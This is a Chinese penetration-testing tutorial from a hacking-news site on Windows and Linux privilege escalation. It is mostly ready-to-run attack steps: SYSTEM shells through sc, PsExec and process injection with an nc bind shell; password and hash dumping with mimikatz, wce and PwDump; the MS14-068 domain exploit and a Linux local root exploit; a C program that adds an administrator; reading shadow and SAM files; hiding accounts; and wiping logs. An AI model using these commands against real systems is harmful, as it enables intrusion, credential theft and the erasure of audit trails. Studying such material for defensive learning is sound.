[渗透测试学习十]提权教程详解

[渗透测试学习十]提权教程详解

黑客资讯访客1970-01-01 8:00:003242A+A-

操作系统默认用户

  • Windows
    User
    Administrator
    System
  • Linux
    User
    Root

Windows本地提权

USER->System

  • WinXP、03
at 10:11 /intertractive cmd
  • Win7、8
sc Create syscmd binPath="cmd /K start" type=own type=interact
sc start syscmd
  • 利用开发工具
    首先下载微软开发工具包:https://download.sysinternals.com/files/SysinternalsSuite.zip
    上传里面的PsExec.exe到服务器
    命令行先进入上传的路径,执行:
PsExec.exe -s cmd

轻松获得系统权限

  • 注入进程提权(隐蔽,不会增加新进程)
    下载工具(系统会杀360也会杀):https://www.tarasco.org/security/Process_Injector/processinjector.zip
    上传到目标系统
    进入上传的路径
    查看当前可注入进程:
pinjector.exe -l

选择一个system用户进程(如services.exe)
注入进程,并且开放侦听一个端口:

pinjector.exe -p 656 cmd 5555

此时就可以连接目标

nc -nv 192.168.1.119 5555

本地缓存密码

各种提取脚本
http://www.nirsoft.net/

提取Windows密码:

在这里插入图片描述
在这里插入图片描述

PwDump

用kali下的/usr/share/windows-binaries/fgdump文件里的PwDump.exe脚本
复制密文,进行哈希解密(网站或ophcrack)
ophcrack:
Load-PwDump file-Crack

wce

利用kali下的/usr/share/wce文件里的wce-universal.exe脚本

wce-universal.exe -l  # 提取密码哈希值
wce-universal.exe -w  # 提取密码明文

防止WCE攻击:
打开注册表编辑器:

regedit

找到
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
将wdigest删掉(注意不要留换行),但是只能单用户登录

mimikatz

在kali的/usr/share/windows-resources下(版本不同可用find / -iname mimikatz查找其位置)
拷贝到Windows,终端找到mimikatz.exe,回车进入

  • 查看帮助
::
  • 提权
privilege::debug
  • 查看密码
sekurlsa::  # 查看命令的子命令
sekurlsa::logonPasswords
sekurlsa::wdigest  # 缓存密码
lsadump::sam  # 查看sam数据库
  • 查看进程
process::list
  • 清除安全日志
event::clear
event::drop  # 不再产生日志

利用漏洞提权

Windows

如何将py脚本转为exe可执行文件

  1. 下载Pyinstaller:https://pypi.org/project/PyInstaller/#files
  2. 进入下载的文件并执行(Linux环境下,Windows需要Python环境)
./pyinstaller.py --onefile test.py

MS14-068漏洞

在本机有administrator权限,获得域权限

  1. 利用kali搜索漏洞利用脚本:
searchsploit ms14-068
  1. 进入脚本路径利用脚本
./35474.py -u a@test.com -s userSID -d dcIP
                |             |
               本机用户名    本机在域里的SID(利用命令whami获取,whami在前面的微软开发工具里有)
  1. 回车输入本机密码后会在当前路径生成一个TGT票据文件,将票据拷贝到mimikatz目录下
  2. 终端打开mimikatz.exe后执行
kerberos::ptc <票据文件>

显示

Injecting ticket:OK

代表成功获得DC权限

Linux

Ubuntu11.10

在kali将漏洞利用脚本拷贝到ubuntu

searchsploit 18411.c
scp /usr/share/exploitdb/exploits/linux/local/18411.c username@192.168.1.149:/home/username/
yes

ubuntu编译运行脚本后普通用户即可获得root权限

gcc 18411.c -o 18411  # 早期版本默认没有gcc,可以编译后再拷贝过来
chmod +x 18411
./18411

利用配置不当提权

(相比漏洞提权更常用的方法)

Windows

查看所有exe文件的权限并保存到当前目录下

icacls c:\WINDOWS\*.exe /save result.txt /t

如果某一程序有FA;;;BU(快速查找)的程序,就可以利用
将c语言脚本文件编译成exe执行文件

i586-mingw32msvc-gcc -o admin.exe admin.c

admin.c

#include <stdlib.h>
int main()
{
	int i;
	i=system {"net localgroup administrators a /add"};
	return 0;
}

Windows上创建一个a用户

net user a a /add

并且将有管理员权限的程序名改为可执行脚本
下次启动,a就会被加入管理员组

Linux

找到权限为777的可执行文件

find / -perm 777 -exec ls -l {} \;

查看系统的配置文件

  • 应用连接数据库的配置文件
  • 后台服务运行账号

基本信息收集

Linux

命令

  • /etc/resolv.conf
  • /etc/passwd
  • /etc/shadow
  • whoami,who -a
  • ifconfig -a,iptables -L -n,netstat -rn
  • uname -a,ps aux
  • apkg -l | head

敏感数据

  • /etc;/usr/local/tec
  • /etc/passwd;/etc/shadow
  • 用户目录下.ssh;.gnupg 公私钥
  • The e-mail and data files
  • 业务数据库;身份认证服务器数据库
  • /tmp

Windows

  • ipconfig /all,ipconfig /displaydns,netstat -bnao,netstat -r
  • net view,net view /domian
  • net user /domain,net user %username% /domain
  • net accounts,net share
  • net localgroup administrators username /add
  • net group “Domain Controllers” /domain
  • net share name$C:\ /unlimited
  • net user username /active:yes /domain

敏感数据

  • SAM数据库;注册表文件
  • %SYSTEMROOT%\repair\SAM(副本)
  • %SYSTEMROOT%System32\config\RegBack|SAM(备份)
  • 业务数据库;省份认证数据库
  • 临时文件目录
  • UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\

隐藏痕迹

Windows

  • 禁止在登录界面显示新建账号
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v **username** /T REG_DWORD /D 0
  • 删除日志
del %WINDIR%\*.log /a/s/q/f

Linux

  • /var/log下的auth.log/secure/btmp/wtmp/lastlog/failog
点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 2条评论
  • 余安温人2022-06-04 20:21:53
  • e可执行文件下载Pyinstaller:https://pypi.org/project/PyInstaller/#files进入下载的文件并执行(Linux环境下,Windows需要Python环境)./pyinstaller.py --onefile te
  • 绿邪安娴2022-06-04 18:14:47
  • rentVersion\WinLogon\SpecialAccounts\UserList" /v **username** /T REG_DWORD /D 0删除日志del %WINDIR%\*.log /a/s/q/fLinux/var/

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理